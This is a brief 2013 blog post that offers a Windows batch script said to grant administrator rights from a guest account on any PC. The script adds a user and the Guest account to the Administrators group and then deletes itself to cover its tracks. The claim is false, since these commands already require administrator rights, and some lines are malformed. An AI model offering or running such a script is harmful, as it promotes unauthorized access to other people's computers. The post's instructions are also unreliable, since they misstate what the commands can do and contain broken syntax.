Friday 23 August 2013

Crack Administrator Password From A Guest Account.




Hey Guys!!!!!!

Want Admin Privileges On Any PC ??
Copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Then double click on it
This will add u in administrators group
Enjoy.



CODE:-
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

No comments:

Post a Comment